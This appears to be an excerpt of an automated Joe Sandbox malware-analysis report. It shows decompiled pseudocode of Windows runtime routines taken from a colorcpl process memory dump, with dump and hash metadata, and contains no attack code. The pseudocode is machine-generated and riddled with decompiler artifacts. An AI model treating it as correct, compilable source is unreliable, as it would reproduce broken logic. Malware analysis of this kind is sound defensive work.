                                                                                                								_v72 = _v72 & 0;
                                                                                                								_v68 = _v72;
                                                                                                								if(E06E37D50() == 0) {
                                                                                                									_t113 = 0x7ffe0388;
                                                                                                								} else {
                                                                                                									_t177 = _v64;
                                                                                                									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                								}
                                                                                                								if( *_t113 == _t132) {
                                                                                                									_t166 = _v68;
                                                                                                									goto L46;
                                                                                                								} else {
                                                                                                									_t166 = _v68;
                                                                                                									E06ECFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							} else {
                                                                                                								L23:
                                                                                                								while(1) {
                                                                                                									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                                                										_t122 =  *_t147;
                                                                                                										if(_t159 == 0) {
                                                                                                											L32:
                                                                                                											if(_t122 == 0) {
                                                                                                												L34:
                                                                                                												_v68 = 0;
                                                                                                												goto L35;
                                                                                                											}
                                                                                                											L33:
                                                                                                											_t147 = _t122;
                                                                                                											continue;
                                                                                                										}
                                                                                                										if(_t122 == 0) {
                                                                                                											goto L34;
                                                                                                										}
                                                                                                										_t122 = _t122 ^ _t147;
                                                                                                										goto L32;
                                                                                                									}
                                                                                                									_t122 =  *(_t147 + 4);
                                                                                                									if(_t159 == 0) {
                                                                                                										L27:
                                                                                                										if(_t122 != 0) {
                                                                                                											goto L33;
                                                                                                										}
                                                                                                										L28:
                                                                                                										_v68 = 1;
                                                                                                										goto L35;
                                                                                                									}
                                                                                                									if(_t122 == 0) {
                                                                                                										goto L28;
                                                                                                									}
                                                                                                									_t122 = _t122 ^ _t147;
                                                                                                									goto L27;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					_v72 = _v72 & 0x00000000;
                                                                                                					goto L11;
                                                                                                				}
                                                                                                			}





































                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `$`
                                                                                                • API String ID: 0-197956300
                                                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                • Instruction ID: f7d41816b6dfbed19a4dda8322b026a341a76c614528e9ee2f4694f769fd8bfd
                                                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                • Instruction Fuzzy Hash: EB91C031604341AFE7A4CE25CC48B6BB7E9BF84714F14992DF9A5CB281E770E906CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 77%
                                                                                                			E06E951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed short* _t63;
                                                                                                				signed int _t64;
                                                                                                				signed int _t65;
                                                                                                				signed int _t67;
                                                                                                				intOrPtr _t74;
                                                                                                				intOrPtr _t84;
                                                                                                				intOrPtr _t88;
                                                                                                				intOrPtr _t94;
                                                                                                				void* _t100;
                                                                                                				void* _t103;
                                                                                                				intOrPtr _t105;
                                                                                                				signed int _t106;
                                                                                                				short* _t108;
                                                                                                				signed int _t110;
                                                                                                				signed int _t113;
                                                                                                				signed int* _t115;
                                                                                                				signed short* _t117;
                                                                                                				void* _t118;
                                                                                                				void* _t119;
                                                                                                
                                                                                                				_push(0x80);
                                                                                                				_push(0x6ef05f0);
                                                                                                				E06E6D0E8(__ebx, __edi, __esi);
                                                                                                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                                				_t115 =  *(_t118 + 0xc);
                                                                                                				 *(_t118 - 0x7c) = _t115;
                                                                                                				 *((char*)(_t118 - 0x65)) = 0;
                                                                                                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                				_t113 = 0;
                                                                                                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                                				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                                				_t100 = __ecx;
                                                                                                				if(_t100 == 0) {
                                                                                                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                					E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                					 *((char*)(_t118 - 0x65)) = 1;
                                                                                                					_t63 =  *(_t118 - 0x90);
                                                                                                					_t101 = _t63[2];
                                                                                                					_t64 =  *_t63 & 0x0000ffff;
                                                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                					L20:
                                                                                                					_t65 = _t64 >> 1;
                                                                                                					L21:
                                                                                                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                                					if(_t108 == 0) {
                                                                                                						L27:
                                                                                                						 *_t115 = _t65 + 1;
                                                                                                						_t67 = 0xc0000023;
                                                                                                						L28:
                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                                						L29:
                                                                                                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                                						E06E953CA(0);
                                                                                                						return E06E6D130(0, _t113, _t115);
                                                                                                					}
                                                                                                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                                							 *_t108 = 0;
                                                                                                						}
                                                                                                						goto L27;
                                                                                                					}
                                                                                                					 *_t115 = _t65;
                                                                                                					_t115 = _t65 + _t65;
                                                                                                					E06E5F3E0(_t108, _t101, _t115);
                                                                                                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                                					_t67 = 0;
                                                                                                					goto L28;
                                                                                                				}
                                                                                                				_t103 = _t100 - 1;
                                                                                                				if(_t103 == 0) {
                                                                                                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                                					_t74 = E06E33690(1, _t117, 0x6df1810, _t118 - 0x74);
                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                                					_t101 = _t117[2];
                                                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                					if(_t74 < 0) {
                                                                                                						_t64 =  *_t117 & 0x0000ffff;
                                                                                                						_t115 =  *(_t118 - 0x7c);
                                                                                                						goto L20;
                                                                                                					}
                                                                                                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                                					_t115 =  *(_t118 - 0x7c);
                                                                                                					goto L21;
                                                                                                				}
                                                                                                				if(_t103 == 1) {
                                                                                                					_t105 = 4;
                                                                                                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                                					_push(_t118 - 0x70);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(_t105);
                                                                                                					_push(_t118 - 0x78);
                                                                                                					_push(0x6b);
                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = E06E5AA90();
                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                					_t113 = L06E34620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                                					if(_t113 != 0) {
                                                                                                						_push(_t118 - 0x70);
                                                                                                						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                                						_push(_t113);
                                                                                                						_push(4);
                                                                                                						_push(_t118 - 0x78);
                                                                                                						_push(0x6b);
                                                                                                						_t84 = E06E5AA90();
                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                                						if(_t84 < 0) {
                                                                                                							goto L29;
                                                                                                						}
                                                                                                						_t110 = 0;
                                                                                                						_t106 = 0;
                                                                                                						while(1) {
                                                                                                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                                							 *(_t118 - 0x88) = _t106;
                                                                                                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                                							_t106 = _t106 + 1;
                                                                                                						}
                                                                                                						_t88 = E06E9500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                                						_t119 = _t119 + 0x1c;
                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                                						if(_t88 < 0) {
                                                                                                							goto L29;
                                                                                                						}
                                                                                                						_t101 = _t118 - 0x3c;
                                                                                                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                                						goto L21;
                                                                                                					}
                                                                                                					_t67 = 0xc0000017;
                                                                                                					goto L28;
                                                                                                				}
                                                                                                				_push(0);
                                                                                                				_push(0x20);
                                                                                                				_push(_t118 - 0x60);
                                                                                                				_push(0x5a);
                                                                                                				_t94 = E06E59860();
                                                                                                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                                				if(_t94 < 0) {
                                                                                                					goto L29;
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                                					_t101 = L"Legacy";
                                                                                                					_push(6);
                                                                                                				} else {
                                                                                                					_t101 = L"UEFI";
                                                                                                					_push(4);
                                                                                                				}
                                                                                                				_pop(_t65);
                                                                                                				goto L21;
                                                                                                			}























                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Legacy$UEFI
                                                                                                • API String ID: 2994545307-634100481
                                                                                                • Opcode ID: 6770d559b6cfa2646f418f2c0a950b5a5e2f5936edd0266d04ffa94b6f12e6e6
                                                                                                • Instruction ID: 257aad8050789a4876cc807a5edf21e12144c9f77e25700df1acc7ff1057e7ad
                                                                                                • Opcode Fuzzy Hash: 6770d559b6cfa2646f418f2c0a950b5a5e2f5936edd0266d04ffa94b6f12e6e6
                                                                                                • Instruction Fuzzy Hash: 63516AB1E10708AFDFA5DFA8CD54AAEBBB8BF48700F14502DE919EB251D6719900CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E06E420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed char _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				signed int _v32;
                                                                                                				void* _v36;
                                                                                                				char _v48;
                                                                                                				signed int _v52;
                                                                                                				signed int _v56;
                                                                                                				unsigned int _v60;
                                                                                                				char _v64;
                                                                                                				unsigned int _v68;
                                                                                                				signed int _v72;
                                                                                                				char _v73;
                                                                                                				signed int _v74;
                                                                                                				char _v75;
                                                                                                				signed int _v76;
                                                                                                				void* _v81;
                                                                                                				void* _v82;
                                                                                                				void* _v89;
                                                                                                				void* _v92;
                                                                                                				void* _v97;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed char _t128;
                                                                                                				void* _t129;
                                                                                                				signed int _t130;
                                                                                                				void* _t132;
                                                                                                				signed char _t133;
                                                                                                				intOrPtr _t135;
                                                                                                				signed int _t137;
                                                                                                				signed int _t140;
                                                                                                				signed int* _t144;
                                                                                                				signed int* _t145;
                                                                                                				intOrPtr _t146;
                                                                                                				signed int _t147;
                                                                                                				signed char* _t148;
                                                                                                				signed int _t149;
                                                                                                				signed int _t153;
                                                                                                				signed int _t169;
                                                                                                				signed int _t174;
                                                                                                				signed int _t180;
                                                                                                				void* _t197;
                                                                                                				void* _t198;
                                                                                                				signed int _t201;
                                                                                                				intOrPtr* _t202;
                                                                                                				intOrPtr* _t205;
                                                                                                				signed int _t210;
                                                                                                				signed int _t215;
                                                                                                				signed int _t218;
                                                                                                				signed char _t221;
                                                                                                				signed int _t226;
                                                                                                				char _t227;
                                                                                                				signed int _t228;
                                                                                                				void* _t229;
                                                                                                				unsigned int _t231;
                                                                                                				void* _t235;
                                                                                                				signed int _t240;
                                                                                                				signed int _t241;
                                                                                                				void* _t242;
                                                                                                				signed int _t246;
                                                                                                				signed int _t248;
                                                                                                				signed int _t252;
                                                                                                				signed int _t253;
                                                                                                				void* _t254;
                                                                                                				intOrPtr* _t256;
                                                                                                				intOrPtr _t257;
                                                                                                				unsigned int _t262;
                                                                                                				signed int _t265;
                                                                                                				void* _t267;
                                                                                                				signed int _t275;
                                                                                                
                                                                                                				_t198 = __ebx;
                                                                                                				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                                                				_v68 = __ecx;
                                                                                                				_v73 = 0;
                                                                                                				_t201 = __edx & 0x00002000;
                                                                                                				_t128 = __edx & 0xffffdfff;
                                                                                                				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                                                				_v72 = _t128;
                                                                                                				if((_t128 & 0x00000008) != 0) {
                                                                                                					__eflags = _t128 - 8;
                                                                                                					if(_t128 != 8) {
                                                                                                						L69:
                                                                                                						_t129 = 0xc000000d;
                                                                                                						goto L23;
                                                                                                					} else {
                                                                                                						_t130 = 0;
                                                                                                						_v72 = 0;
                                                                                                						_v75 = 1;
                                                                                                						L2:
                                                                                                						_v74 = 1;
                                                                                                						_t226 =  *0x6f08714; // 0x0
                                                                                                						if(_t226 != 0) {
                                                                                                							__eflags = _t201;
                                                                                                							if(_t201 != 0) {
                                                                                                								L62:
                                                                                                								_v74 = 1;
                                                                                                								L63:
                                                                                                								_t130 = _t226 & 0xffffdfff;
                                                                                                								_v72 = _t130;
                                                                                                								goto L3;
                                                                                                							}
                                                                                                							_v74 = _t201;
                                                                                                							__eflags = _t226 & 0x00002000;
                                                                                                							if((_t226 & 0x00002000) == 0) {
                                                                                                								goto L63;
                                                                                                							}
                                                                                                							goto L62;
                                                                                                						}
                                                                                                						L3:
                                                                                                						_t227 = _v75;
                                                                                                						L4:
                                                                                                						_t240 = 0;
                                                                                                						_v56 = 0;
                                                                                                						_t252 = _t130 & 0x00000100;
                                                                                                						if(_t252 != 0 || _t227 != 0) {
                                                                                                							_t240 = _v68;
                                                                                                							_t132 = E06E42EB0(_t240);
                                                                                                							__eflags = _t132 - 2;
                                                                                                							if(_t132 != 2) {
                                                                                                								__eflags = _t132 - 1;
                                                                                                								if(_t132 == 1) {
                                                                                                									goto L25;
                                                                                                								}
                                                                                                								__eflags = _t132 - 6;
                                                                                                								if(_t132 == 6) {
                                                                                                									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                                                									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                                                										goto L40;
                                                                                                									}
                                                                                                									_t197 = E06E42EB0(_t240 + 8);
                                                                                                									__eflags = _t197 - 2;
                                                                                                									if(_t197 == 2) {
                                                                                                										goto L25;
                                                                                                									}
                                                                                                								}
                                                                                                								L40:
                                                                                                								_t133 = 1;
                                                                                                								L26:
                                                                                                								_t228 = _v75;
                                                                                                								_v56 = _t240;
                                                                                                								__eflags = _t133;
                                                                                                								if(_t133 != 0) {
                                                                                                									__eflags = _t228;
                                                                                                									if(_t228 == 0) {
                                                                                                										L43:
                                                                                                										__eflags = _v72;
                                                                                                										if(_v72 == 0) {
                                                                                                											goto L8;
                                                                                                										}
                                                                                                										goto L69;
                                                                                                									}
                                                                                                									_t133 = E06E158EC(_t240);
                                                                                                									_t221 =  *0x6f05cac; // 0x16
                                                                                                									__eflags = _t221 & 0x00000040;
                                                                                                									if((_t221 & 0x00000040) != 0) {
                                                                                                										_t228 = 0;
                                                                                                										__eflags = _t252;
                                                                                                										if(_t252 != 0) {
                                                                                                											goto L43;
                                                                                                										}
                                                                                                										_t133 = _v72;
                                                                                                										goto L7;
                                                                                                									}
                                                                                                									goto L43;
                                                                                                								} else {
                                                                                                									_t133 = _v72;
                                                                                                									goto L6;
                                                                                                								}
                                                                                                							}
                                                                                                							L25:
                                                                                                							_t133 = _v73;
                                                                                                							goto L26;
                                                                                                						} else {
                                                                                                							L6:
                                                                                                							_t221 =  *0x6f05cac; // 0x16
                                                                                                							L7:
                                                                                                							if(_t133 != 0) {
                                                                                                								__eflags = _t133 & 0x00001000;
                                                                                                								if((_t133 & 0x00001000) != 0) {
                                                                                                									_t133 = _t133 | 0x00000a00;
                                                                                                									__eflags = _t221 & 0x00000004;
                                                                                                									if((_t221 & 0x00000004) != 0) {
                                                                                                										_t133 = _t133 | 0x00000400;
                                                                                                									}
                                                                                                								}
                                                                                                								__eflags = _t228;
                                                                                                								if(_t228 != 0) {
                                                                                                									_t133 = _t133 | 0x00000100;
                                                                                                								}
                                                                                                								_t229 = E06E54A2C(0x6f06e40, 0x6e54b30, _t133, _t240);
                                                                                                								__eflags = _t229;
                                                                                                								if(_t229 == 0) {
                                                                                                									_t202 = _a20;
                                                                                                									goto L100;
                                                                                                								} else {
                                                                                                									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                                                									L15:
                                                                                                									_t202 = _a20;
                                                                                                									 *_t202 = _t135;
                                                                                                									if(_t229 == 0) {
                                                                                                										L100:
                                                                                                										 *_a4 = 0;
                                                                                                										_t137 = _a8;
                                                                                                										__eflags = _t137;
                                                                                                										if(_t137 != 0) {
                                                                                                											 *_t137 = 0;
                                                                                                										}
                                                                                                										 *_t202 = 0;
                                                                                                										_t129 = 0xc0000017;
                                                                                                										goto L23;
                                                                                                									} else {
                                                                                                										_t242 = _a16;
                                                                                                										if(_t242 != 0) {
                                                                                                											_t254 = _t229;
                                                                                                											memcpy(_t242, _t254, 0xd << 2);
                                                                                                											_t267 = _t267 + 0xc;
                                                                                                											_t242 = _t254 + 0x1a;
                                                                                                										}
                                                                                                										_t205 = _a4;
                                                                                                										_t25 = _t229 + 0x48; // 0x48
                                                                                                										 *_t205 = _t25;
                                                                                                										_t140 = _a8;
                                                                                                										if(_t140 != 0) {
                                                                                                											__eflags =  *((char*)(_t267 + 0xa));
                                                                                                											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                                                												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                                                											} else {
                                                                                                												 *_t140 = 0;
                                                                                                											}
                                                                                                										}
                                                                                                										_t256 = _a12;
                                                                                                										if(_t256 != 0) {
                                                                                                											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                                                										}
                                                                                                										_t257 =  *_t205;
                                                                                                										_v48 = 0;
                                                                                                										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                                                										_v56 = 0;
                                                                                                										_v52 = 0;
                                                                                                										_t144 =  *( *[fs:0x30] + 0x50);
                                                                                                										if(_t144 != 0) {
                                                                                                											__eflags =  *_t144;
                                                                                                											if( *_t144 == 0) {
                                                                                                												goto L20;
                                                                                                											}
                                                                                                											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                                											goto L21;
                                                                                                										} else {
                                                                                                											L20:
                                                                                                											_t145 = 0x7ffe0384;
                                                                                                											L21:
                                                                                                											if( *_t145 != 0) {
                                                                                                												_t146 =  *[fs:0x30];
                                                                                                												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                                                												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                                                													_t147 = E06E37D50();
                                                                                                													__eflags = _t147;
                                                                                                													if(_t147 == 0) {
                                                                                                														_t148 = 0x7ffe0385;
                                                                                                													} else {
                                                                                                														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                                													}
                                                                                                													__eflags =  *_t148 & 0x00000020;
                                                                                                													if(( *_t148 & 0x00000020) != 0) {
                                                                                                														_t149 = _v72;
                                                                                                														__eflags = _t149;
                                                                                                														if(__eflags == 0) {
                                                                                                															_t149 = 0x6df5c80;
                                                                                                														}
                                                                                                														_push(_t149);
                                                                                                														_push( &_v48);
                                                                                                														 *((char*)(_t267 + 0xb)) = E06E4F6E0(_t198, _t242, _t257, __eflags);
                                                                                                														_push(_t257);
                                                                                                														_push( &_v64);
                                                                                                														_t153 = E06E4F6E0(_t198, _t242, _t257, __eflags);
                                                                                                														__eflags =  *((char*)(_t267 + 0xb));
                                                                                                														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                                															__eflags = _t153;
                                                                                                															if(_t153 != 0) {
                                                                                                																__eflags = 0;
                                                                                                																E06E97016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                                                																L06E32400(_t267 + 0x20);
                                                                                                															}
                                                                                                															L06E32400( &_v64);
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											_t129 = 0;
                                                                                                											L23:
                                                                                                											return _t129;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							L8:
                                                                                                							_t275 = _t240;
                                                                                                							if(_t275 != 0) {
                                                                                                								_v73 = 0;
                                                                                                								_t253 = 0;
                                                                                                								__eflags = 0;
                                                                                                								L29:
                                                                                                								_push(0);
                                                                                                								_t241 = E06E42397(_t240);
                                                                                                								__eflags = _t241;
                                                                                                								if(_t241 == 0) {
                                                                                                									_t229 = 0;
                                                                                                									L14:
                                                                                                									_t135 = 0;
                                                                                                									goto L15;
                                                                                                								}
                                                                                                								__eflags =  *((char*)(_t267 + 0xb));
                                                                                                								 *(_t241 + 0x34) = 1;
                                                                                                								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                                									E06E32280(_t134, 0x6f08608);
                                                                                                									__eflags =  *0x6f06e48 - _t253; // 0xe24140
                                                                                                									if(__eflags != 0) {
                                                                                                										L48:
                                                                                                										_t253 = 0;
                                                                                                										__eflags = 0;
                                                                                                										L49:
                                                                                                										E06E2FFB0(_t198, _t241, 0x6f08608);
                                                                                                										__eflags = _t253;
                                                                                                										if(_t253 != 0) {
                                                                                                											L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                                                										}
                                                                                                										goto L31;
                                                                                                									}
                                                                                                									 *0x6f06e48 = _t241;
                                                                                                									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                                                									__eflags = _t253;
                                                                                                									if(_t253 != 0) {
                                                                                                										_t57 = _t253 + 0x34;
                                                                                                										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                                                										__eflags =  *_t57;
                                                                                                										if( *_t57 == 0) {
                                                                                                											goto L49;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L48;
                                                                                                								}
                                                                                                								L31:
                                                                                                								_t229 = _t241;
                                                                                                								goto L14;
                                                                                                							}
                                                                                                							_v73 = 1;
                                                                                                							_v64 = _t240;
                                                                                                							asm("lock bts dword [esi], 0x0");
                                                                                                							if(_t275 < 0) {
                                                                                                								_t231 =  *0x6f08608; // 0x0
                                                                                                								while(1) {
                                                                                                									_v60 = _t231;
                                                                                                									__eflags = _t231 & 0x00000001;
                                                                                                									if((_t231 & 0x00000001) != 0) {
                                                                                                										goto L76;
                                                                                                									}
                                                                                                									_t73 = _t231 + 1; // 0x1
                                                                                                									_t210 = _t73;
                                                                                                									asm("lock cmpxchg [edi], ecx");
                                                                                                									__eflags = _t231 - _t231;
                                                                                                									if(_t231 != _t231) {
                                                                                                										L92:
                                                                                                										_t133 = E06E46B90(_t210,  &_v64);
                                                                                                										_t262 =  *0x6f08608; // 0x0
                                                                                                										L93:
                                                                                                										_t231 = _t262;
                                                                                                										continue;
                                                                                                									}
                                                                                                									_t240 = _v56;
                                                                                                									goto L10;
                                                                                                									L76:
                                                                                                									_t169 = E06E4E180(_t133);
                                                                                                									__eflags = _t169;
                                                                                                									if(_t169 != 0) {
                                                                                                										_push(0xc000004b);
                                                                                                										_push(0xffffffff);
                                                                                                										E06E597C0();
                                                                                                										_t231 = _v68;
                                                                                                									}
                                                                                                									_v72 = 0;
                                                                                                									_v24 =  *( *[fs:0x18] + 0x24);
                                                                                                									_v16 = 3;
                                                                                                									_v28 = 0;
                                                                                                									__eflags = _t231 & 0x00000002;
                                                                                                									if((_t231 & 0x00000002) == 0) {
                                                                                                										_v32 =  &_v36;
                                                                                                										_t174 = _t231 >> 4;
                                                                                                										__eflags = 1 - _t174;
                                                                                                										_v20 = _t174;
                                                                                                										asm("sbb ecx, ecx");
                                                                                                										_t210 = 3 |  &_v36;
                                                                                                										__eflags = _t174;
                                                                                                										if(_t174 == 0) {
                                                                                                											_v20 = 0xfffffffe;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_v32 = 0;
                                                                                                										_v20 = 0xffffffff;
                                                                                                										_v36 = _t231 & 0xfffffff0;
                                                                                                										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                                                										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                                                									}
                                                                                                									asm("lock cmpxchg [edi], esi");
                                                                                                									_t262 = _t231;
                                                                                                									__eflags = _t262 - _t231;
                                                                                                									if(_t262 != _t231) {
                                                                                                										goto L92;
                                                                                                									} else {
                                                                                                										__eflags = _v72;
                                                                                                										if(_v72 != 0) {
                                                                                                											E06E5006A(0x6f08608, _t210);
                                                                                                										}
                                                                                                										__eflags =  *0x7ffe036a - 1;
                                                                                                										if(__eflags <= 0) {
                                                                                                											L89:
                                                                                                											_t133 =  &_v16;
                                                                                                											asm("lock btr dword [eax], 0x1");
                                                                                                											if(__eflags >= 0) {
                                                                                                												goto L93;
                                                                                                											} else {
                                                                                                												goto L90;
                                                                                                											}
                                                                                                											do {
                                                                                                												L90:
                                                                                                												_push(0);
                                                                                                												_push(0x6f08608);
                                                                                                												E06E5B180();
                                                                                                												_t133 = _v24;
                                                                                                												__eflags = _t133 & 0x00000004;
                                                                                                											} while ((_t133 & 0x00000004) == 0);
                                                                                                											goto L93;
                                                                                                										} else {
                                                                                                											_t218 =  *0x6f06904; // 0x400
                                                                                                											__eflags = _t218;
                                                                                                											if(__eflags == 0) {
                                                                                                												goto L89;
                                                                                                											} else {
                                                                                                												goto L87;
                                                                                                											}
                                                                                                											while(1) {
                                                                                                												L87:
                                                                                                												__eflags = _v16 & 0x00000002;
                                                                                                												if(__eflags == 0) {
                                                                                                													goto L89;
                                                                                                												}
                                                                                                												asm("pause");
                                                                                                												_t218 = _t218 - 1;
                                                                                                												__eflags = _t218;
                                                                                                												if(__eflags != 0) {
                                                                                                													continue;
                                                                                                												}
                                                                                                												goto L89;
                                                                                                											}
                                                                                                											goto L89;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							L10:
                                                                                                							_t229 =  *0x6f06e48; // 0xe24140
                                                                                                							_v72 = _t229;
                                                                                                							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                                								E06E2FFB0(_t198, _t240, 0x6f08608);
                                                                                                								_t253 = _v76;
                                                                                                								goto L29;
                                                                                                							} else {
                                                                                                								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                                                								asm("lock cmpxchg [esi], ecx");
                                                                                                								_t215 = 1;
                                                                                                								if(1 != 1) {
                                                                                                									while(1) {
                                                                                                										_t246 = _t215 & 0x00000006;
                                                                                                										_t180 = _t215;
                                                                                                										__eflags = _t246 - 2;
                                                                                                										_v56 = _t246;
                                                                                                										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                                                										asm("lock cmpxchg [edi], esi");
                                                                                                										_t248 = _v56;
                                                                                                										__eflags = _t180 - _t215;
                                                                                                										if(_t180 == _t215) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t215 = _t180;
                                                                                                									}
                                                                                                									__eflags = _t248 - 2;
                                                                                                									if(_t248 == 2) {
                                                                                                										__eflags = 0;
                                                                                                										E06E500C2(0x6f08608, 0, _t235);
                                                                                                									}
                                                                                                									_t229 = _v72;
                                                                                                								}
                                                                                                								goto L14;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_t227 = 0;
                                                                                                				_v75 = 0;
                                                                                                				if(_t128 != 0) {
                                                                                                					goto L4;
                                                                                                				}
                                                                                                				goto L2;
                                                                                                			}











































































                                                                                                0x06e42348
                                                                                                0x06e4234d
                                                                                                0x06e85840
                                                                                                0x06e85845
                                                                                                0x06e85848
                                                                                                0x06e8584e
                                                                                                0x06e8584e
                                                                                                0x06e85848
                                                                                                0x06e42353
                                                                                                0x06e42355
                                                                                                0x06e42388
                                                                                                0x06e42388
                                                                                                0x06e42368
                                                                                                0x06e4236a
                                                                                                0x06e4236c
